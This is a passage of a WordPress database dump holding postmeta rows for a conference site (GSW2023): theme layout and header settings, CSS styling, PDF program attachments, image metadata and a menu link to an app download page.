(36355,5364,'_dt_post_options_related_mode','same'),
(36356,5364,'_dt_post_options_preview','normal'),
(36357,5364,'_dt_microsite_primary_menu',''),
(36358,5364,'_dt_microsite_split_left_menu',''),
(36359,5364,'_dt_microsite_split_right_menu',''),
(36360,5364,'_dt_microsite_mobile_menu',''),
(36361,5364,'_edit_lock','1692750371:1'),
(36366,5364,'_dt_microsite_page_layout','wide'),
(36367,5364,'_dt_microsite_page_loading','enabled'),
(36368,5364,'_dt_microsite_logo_link',''),
(36369,5364,'main_logo_heading',''),
(36370,5364,'_dt_microsite_main_logo_type','default'),
(36371,5364,'_dt_microsite_main_logo_regular','a:0:{}'),
(36372,5364,'_dt_microsite_main_logo_hd','a:0:{}'),
(36373,5364,'transparent_logo_heading',''),
(36374,5364,'_dt_microsite_transparent_logo_type','default'),
(36375,5364,'_dt_microsite_transparent_logo_regular','a:0:{}'),
(36376,5364,'_dt_microsite_transparent_logo_hd','a:0:{}'),
(36377,5364,'mixed_logo_heading',''),
(36378,5364,'_dt_microsite_mixed_logo_type','default'),
(36379,5364,'_dt_microsite_mixed_logo_regular','a:0:{}'),
(36380,5364,'_dt_microsite_mixed_logo_hd','a:0:{}'),
(36381,5364,'mixed_transparent_logo_heading',''),
(36382,5364,'_dt_microsite_mixed_transparent_logo_type','default'),
(36383,5364,'_dt_microsite_mixed_transparent_logo_regular','a:0:{}'),
(36384,5364,'_dt_microsite_mixed_transparent_logo_hd','a:0:{}'),
(36385,5364,'floating_logo_heading',''),
(36386,5364,'_dt_microsite_floating_logo_type','default'),
(36387,5364,'_dt_microsite_floating_logo_regular','a:0:{}'),
(36388,5364,'_dt_microsite_floating_logo_hd','a:0:{}'),
(36389,5364,'_dt_microsite_mobile_logo_type','default'),
(36390,5364,'_dt_microsite_mobile_logo_regular','a:0:{}'),
(36391,5364,'_dt_microsite_mobile_logo_hd','a:0:{}'),
(36392,5364,'_dt_microsite_transparent_mobile_logo_type','default'),
(36393,5364,'_dt_microsite_transparent_mobile_logo_regular','a:0:{}'),
(36394,5364,'_dt_microsite_transparent_mobile_logo_hd','a:0:{}'),
(36395,5364,'bottom_logo_heading',''),
(36396,5364,'_dt_microsite_bottom_logo_type','default'),
(36397,5364,'_dt_microsite_bottom_logo_regular','a:0:{}'),
(36398,5364,'_dt_microsite_bottom_logo_hd','a:0:{}'),
(36399,5364,'favicon_heading',''),
(36400,5364,'_dt_microsite_favicon_type','default'),
(36401,5364,'_dt_microsite_favicon','a:0:{}'),
(36402,5364,'_dt_microsite_favicon_hd','a:0:{}'),
(36405,5364,'_dt_fancy_header_layout_heading',''),
(36406,5364,'_dt_fancy_header_title_aligment','center'),
(36407,5364,'_dt_fancy_header_height','300'),
(36408,5364,'_dt_fancy_header_padding-top','0px'),
(36409,5364,'_dt_fancy_header_padding-bottom','0px'),
(36410,5364,'_dt_fancy_header_breadcrumbs_heading',''),
(36411,5364,'_dt_fancy_header_breadcrumbs','disabled'),
(36412,5364,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(36413,5364,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(36414,5364,'_dt_fancy_header_title_heading',''),
(36415,5364,'_dt_fancy_header_title_mode','generic'),
(36416,5364,'_dt_fancy_header_title',''),
(36417,5364,'_dt_fancy_header_title_font_size','30'),
(36418,5364,'_dt_fancy_header_title_line_height','36'),
(36419,5364,'_dt_fancy_header_text_transform','none'),
(36420,5364,'_dt_fancy_header_title_color_mode','color'),
(36421,5364,'_dt_fancy_header_title_color','#ffffff'),
(36422,5364,'_dt_fancy_header_subtitle_heading',''),
(36423,5364,'_dt_fancy_header_subtitle',''),
(36424,5364,'_dt_fancy_header_subtitle_font_size','18'),
(36425,5364,'_dt_fancy_header_subtitle_line_height','26'),
(36426,5364,'_dt_fancy_header_subtitle_text_transform','none'),
(36427,5364,'_dt_fancy_header_subtitle_color_mode','color'),
(36428,5364,'_dt_fancy_header_subtitle_color','#ffffff'),
(36429,5364,'_dt_fancy_header_bg_heading',''),
(36430,5364,'_dt_fancy_header_bg_color','#222222'),
(36431,5364,'_dt_fancy_header_bg_image_origin','custom'),
(36432,5364,'_dt_fancy_header_bg_image','a:0:{}'),
(36433,5364,'_dt_fancy_header_bg_repeat','no-repeat'),
(36434,5364,'_dt_fancy_header_bg_position_x','center'),
(36435,5364,'_dt_fancy_header_bg_position_y','center'),
(36436,5364,'_dt_fancy_header_bg_fullscreen','1'),
(36437,5364,'_dt_fancy_header_bg_overlay','0'),
(36438,5364,'_dt_fancy_header_overlay_color','#000'),
(36439,5364,'_dt_fancy_header_bg_overlay_opacity','50'),
(36440,5364,'_dt_fancy_header_scroll_effect','default'),
(36441,5364,'_dt_fancy_header_bg_parallax','0.5'),
(36442,5364,'_dt_fancy_header_responsiveness_heading',''),
(36443,5364,'_dt_fancy_header_responsiveness','disabled'),
(36444,5364,'_dt_fancy_header_responsiveness_switch','778px'),
(36445,5364,'_dt_fancy_header_responsive_height','70'),
(36446,5364,'_dt_fancy_header_responsive_font_size','30'),
(36447,5364,'_dt_fancy_header_responsive_title_line_height','38'),
(36448,5364,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(36449,5364,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(36450,5364,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(36451,5364,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(36458,5364,'_last_editor_used_jetpack','classic-editor'),
(36461,5364,'rs_page_bg_color',''),
(36466,5364,'_has_fluentform','a:1:{i:1;s:1:\"1\";}'),
(36467,5122,'_last_editor_used_jetpack','classic-editor'),
(36472,5122,'_wpb_post_custom_layout','default'),
(36476,5377,'_wpb_post_custom_layout','default'),
(36480,5381,'_wp_attached_file','2023/08/GSW2023-Program-2023-08-23-1.pdf'),
(36481,5381,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1994876;}'),
(36486,5382,'_wpb_post_custom_layout','default'),
(36487,5386,'_wp_attached_file','2023/08/GSW2023-Program-2023-08-23-2.pdf'),
(36488,5386,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1994876;}'),
(36489,5383,'_edit_lock','1692944975:1'),
(36490,5383,'_edit_last','1'),
(36491,5383,'_wp_page_template','default'),
(36494,5383,'_wpb_vc_js_status','false'),
(36495,5383,'_dt_sidebar_position','disabled'),
(36496,5383,'_dt_sidebar_widgetarea_id','sidebar_1'),
(36497,5383,'_dt_sidebar_hide_on_mobile','0'),
(36498,5383,'_dt_footer_show','0'),
(36499,5383,'_dt_footer_widgetarea_id','sidebar_2'),
(36500,5383,'_dt_footer_hide_on_mobile','0'),
(36501,5383,'_dt_header_title','fancy'),
(36502,5383,'_dt_header_background','normal'),
(36503,5383,'_dt_header_background_below_slideshow','disabled'),
(36504,5383,'_dt_header_transparent_bg_color_scheme','light'),
(36505,5383,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(36506,5383,'_dt_header_transparent_top_bar_bg_opacity','25'),
(36507,5383,'_dt_header_transparent_bg_color','#000000'),
(36508,5383,'_dt_header_transparent_bg_opacity','50'),
(36509,5383,'_dt_header_disabled_background','normal'),
(36510,5383,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(36511,5383,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(36512,5383,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(36513,5383,'_dt_header_disabled_transparent_bg_color','#000000'),
(36514,5383,'_dt_header_disabled_transparent_bg_opacity','50'),
(36515,5383,'_dt_page_overrides_top_margin',''),
(36516,5383,'_dt_page_overrides_right_margin',''),
(36517,5383,'_dt_page_overrides_bottom_margin',''),
(36518,5383,'_dt_page_overrides_left_margin',''),
(36519,5383,'_dt_mobile_page_padding_top',''),
(36520,5383,'_dt_mobile_page_padding_right',''),
(36521,5383,'_dt_mobile_page_padding_bottom',''),
(36522,5383,'_dt_mobile_page_padding_left',''),
(36523,5383,'_dt_fancy_header_layout_heading',''),
(36524,5383,'_dt_fancy_header_title_aligment','center'),
(36525,5383,'_dt_fancy_header_height','300'),
(36526,5383,'_dt_fancy_header_padding-top','0px'),
(36527,5383,'_dt_fancy_header_padding-bottom','0px'),
(36528,5383,'_dt_fancy_header_breadcrumbs_heading',''),
(36529,5383,'_dt_fancy_header_breadcrumbs','disabled'),
(36530,5383,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(36531,5383,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(36532,5383,'_dt_fancy_header_title_heading',''),
(36533,5383,'_dt_fancy_header_title_mode','generic'),
(36534,5383,'_dt_fancy_header_title',''),
(36535,5383,'_dt_fancy_header_title_font_size','30'),
(36536,5383,'_dt_fancy_header_title_line_height','36'),
(36537,5383,'_dt_fancy_header_text_transform','none'),
(36538,5383,'_dt_fancy_header_title_color_mode','color'),
(36539,5383,'_dt_fancy_header_title_color','#ffffff'),
(36540,5383,'_dt_fancy_header_subtitle_heading',''),
(36541,5383,'_dt_fancy_header_subtitle',''),
(36542,5383,'_dt_fancy_header_subtitle_font_size','18'),
(36543,5383,'_dt_fancy_header_subtitle_line_height','26'),
(36544,5383,'_dt_fancy_header_subtitle_text_transform','none'),
(36545,5383,'_dt_fancy_header_subtitle_color_mode','color'),
(36546,5383,'_dt_fancy_header_subtitle_color','#ffffff'),
(36547,5383,'_dt_fancy_header_bg_heading',''),
(36548,5383,'_dt_fancy_header_bg_color','#222222'),
(36549,5383,'_dt_fancy_header_bg_image_origin','custom'),
(36550,5383,'_dt_fancy_header_bg_image','a:0:{}'),
(36551,5383,'_dt_fancy_header_bg_repeat','no-repeat'),
(36552,5383,'_dt_fancy_header_bg_position_x','center'),
(36553,5383,'_dt_fancy_header_bg_position_y','center'),
(36554,5383,'_dt_fancy_header_bg_fullscreen','1'),
(36555,5383,'_dt_fancy_header_bg_overlay','0'),
(36556,5383,'_dt_fancy_header_overlay_color','#000'),
(36557,5383,'_dt_fancy_header_bg_overlay_opacity','50'),
(36558,5383,'_dt_fancy_header_scroll_effect','default'),
(36559,5383,'_dt_fancy_header_bg_parallax','0.5'),
(36560,5383,'_dt_fancy_header_responsiveness_heading',''),
(36561,5383,'_dt_fancy_header_responsiveness','enabled'),
(36562,5383,'_dt_fancy_header_responsiveness_switch','778px'),
(36563,5383,'_dt_fancy_header_responsive_height','70'),
(36564,5383,'_dt_fancy_header_responsive_font_size','30'),
(36565,5383,'_dt_fancy_header_responsive_title_line_height','38'),
(36566,5383,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(36567,5383,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(36568,5383,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(36569,5383,'_dt_post_options_back_button',''),
(36570,5383,'_dt_post_options_hide_thumbnail','0'),
(36571,5383,'_dt_post_options_related_mode','same'),
(36572,5383,'_dt_post_options_preview','normal'),
(36573,5383,'_dt_microsite_primary_menu',''),
(36574,5383,'_dt_microsite_split_left_menu',''),
(36575,5383,'_dt_microsite_split_right_menu',''),
(36576,5383,'_dt_microsite_mobile_menu',''),
(36577,5383,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(36580,5383,'rs_page_bg_color',''),
(36581,5389,'_wp_attached_file','2023/08/GSW2023-Program-2023-08-23-3.pdf'),
(36582,5389,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1994876;}'),
(36587,5391,'_wpb_post_custom_layout','default'),
(36590,5392,'_wpb_post_custom_layout','default'),
(36597,5393,'_wpb_post_custom_layout','default'),
(36598,5394,'_wp_attached_file','2023/08/GSW2023-Program-2023-08-23-4.pdf'),
(36599,5394,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1994876;}'),
(36602,5395,'_wpb_post_custom_layout','default'),
(36605,5396,'_wpb_post_custom_layout','default'),
(36606,2082,'_wp_old_date','2023-08-13'),
(36607,2083,'_wp_old_date','2023-08-13'),
(36608,2346,'_wp_old_date','2023-08-13'),
(36609,2348,'_wp_old_date','2023-08-13'),
(36610,2349,'_wp_old_date','2023-08-13'),
(36611,2350,'_wp_old_date','2023-08-13'),
(36612,2351,'_wp_old_date','2023-08-13'),
(36613,2904,'_wp_old_date','2023-08-13'),
(36614,3556,'_wp_old_date','2023-08-13'),
(36615,4852,'_wp_old_date','2023-08-13'),
(36616,2084,'_wp_old_date','2023-08-13'),
(36617,2352,'_wp_old_date','2023-08-13'),
(36618,5117,'_wp_old_date','2023-08-13'),
(36619,5118,'_wp_old_date','2023-08-13'),
(36620,3671,'_wp_old_date','2023-08-13'),
(36621,5119,'_wp_old_date','2023-08-13'),
(36622,5120,'_wp_old_date','2023-08-13'),
(36623,2281,'_wp_old_date','2023-08-13'),
(36624,2353,'_wp_old_date','2023-08-13'),
(36625,2354,'_wp_old_date','2023-08-13'),
(36626,2355,'_wp_old_date','2023-08-13'),
(36627,2282,'_wp_old_date','2023-08-13'),
(36628,2283,'_wp_old_date','2023-08-13'),
(36629,3645,'_wp_old_date','2023-08-13'),
(36630,2284,'_wp_old_date','2023-08-13'),
(36631,2921,'_wp_old_date','2023-08-13'),
(36632,2285,'_wp_old_date','2023-08-13'),
(36633,2356,'_wp_old_date','2023-08-13'),
(36634,2357,'_wp_old_date','2023-08-13'),
(36635,2359,'_wp_old_date','2023-08-13'),
(36636,2358,'_wp_old_date','2023-08-13'),
(36637,2286,'_wp_old_date','2023-08-13'),
(36640,5397,'_wpb_post_custom_layout','default'),
(36642,5400,'_wp_attached_file','2023/08/survey.jpg'),
(36643,5400,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1839;s:6:\"height\";i:1851;s:4:\"file\";s:18:\"2023/08/survey.jpg\";s:8:\"filesize\";i:268200;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"survey-298x300.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20184;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"survey-1017x1024.jpg\";s:5:\"width\";i:1017;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103418;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"survey-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7574;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"survey-768x773.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:773;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71412;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"survey-1526x1536.jpg\";s:5:\"width\";i:1526;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:175182;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:18:\"survey-500x503.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:503;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39984;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:18:\"survey-800x805.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:805;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75153;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:20:\"survey-1280x1288.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1288;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139974;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:1:\"m\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:10:\"Untitled-3\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(36644,5139,'_finley_view_count','1'),
(36645,5402,'_menu_item_type','custom'),
(36646,5402,'_menu_item_menu_item_parent','2285'),
(36647,5402,'_menu_item_object_id','5402'),
(36648,5402,'_menu_item_object','custom'),
(36649,5402,'_menu_item_target',''),
(36650,5402,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(36651,5402,'_menu_item_xfn',''),
(36652,5402,'_menu_item_url','https://gsw2023.com/index.php/2023/08/26/download-the-gsw2023-app/'),
(36654,2082,'_wp_old_date','2023-08-23'),
(36655,2083,'_wp_old_date','2023-08-23'),
(36656,2346,'_wp_old_date','2023-08-23'),
(36657,2348,'_wp_old_date','2023-08-23'),
(36658,2349,'_wp_old_date','2023-08-23'),
(36659,2350,'_wp_old_date','2023-08-23'),
(36660,2351,'_wp_old_date','2023-08-23'),
(36661,2904,'_wp_old_date','2023-08-23'),
(36662,3556,'_wp_old_date','2023-08-23'),
(36663,4852,'_wp_old_date','2023-08-23'),
(36664,2084,'_wp_old_date','2023-08-23'),
(36665,2352,'_wp_old_date','2023-08-23'),
(36666,5117,'_wp_old_date','2023-08-23'),
(36667,5118,'_wp_old_date','2023-08-23'),
(36668,3671,'_wp_old_date','2023-08-23'),
(36669,5119,'_wp_old_date','2023-08-23'),
(36670,5120,'_wp_old_date','2023-08-23'),
(36671,2281,'_wp_old_date','2023-08-23'),
(36672,2353,'_wp_old_date','2023-08-23'),
(36673,2354,'_wp_old_date','2023-08-23'),
(36674,2355,'_wp_old_date','2023-08-23'),
(36675,2282,'_wp_old_date','2023-08-23'),
(36676,2283,'_wp_old_date','2023-08-23'),
(36677,3645,'_wp_old_date','2023-08-23'),
(36678,2284,'_wp_old_date','2023-08-23'),
(36679,2921,'_wp_old_date','2023-08-23'),
(36680,2285,'_wp_old_date','2023-08-23'),
(36681,2356,'_wp_old_date','2023-08-23'),
(36682,2357,'_wp_old_date','2023-08-23'),
(36683,2359,'_wp_old_date','2023-08-23'),
(36684,2358,'_wp_old_date','2023-08-23'),
(36685,2286,'_wp_old_date','2023-08-23'),
(36686,5403,'_wpb_post_custom_layout','default'),
(36687,5403,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(36688,5403,'_wpb_shortcodes_custom_css_updated','1'),
(36689,5404,'_wpb_post_custom_layout','default'),
(36690,5404,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px 